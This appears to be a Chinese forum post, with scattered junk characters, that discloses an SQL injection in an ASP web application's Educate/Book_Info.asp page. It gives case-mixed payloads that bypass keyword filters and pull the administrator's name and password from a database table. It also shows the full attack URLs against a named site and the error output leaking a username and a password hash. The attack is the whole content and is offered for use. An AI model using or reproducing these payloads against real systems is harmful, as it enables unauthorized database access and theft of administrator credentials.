漏洞出现在Educate/Book_Info.asp
2 ^. x M! p2 @3 X+ \' c& Z此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
% D7 S! H" R) h4 Texp:如下
; V4 l' ]/ S0 T# E; d" |查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)" G( n6 h- r9 T* Y7 h- n& {
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
1 e1 I% z+ W" B1 o# Shttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
( t- j1 P8 j4 x) v8 `) K' _" _Microsoft OLE DB Provider for SQL Server 错误 '80040e07'$ Z, w/ \$ V6 ?" V& ^' C
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
3 d% N1 O5 N8 z" k/Educate/Book_Info.asp,行 80 |6 G/ Y8 J) }3 P: F
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)1 i4 Q: M5 I+ y7 h; Y4 H; `
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
x; n0 i1 o. s8 J5 u. q1 G' g7 [0 _将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。7 ]0 P8 I1 p: O2 I" M; a. \' C
/Educate/Book_Info.asp,行 8 |